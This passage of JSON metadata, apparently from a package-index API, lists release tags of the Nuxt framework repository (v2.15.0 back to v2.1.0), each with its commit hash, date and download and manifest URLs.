ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://code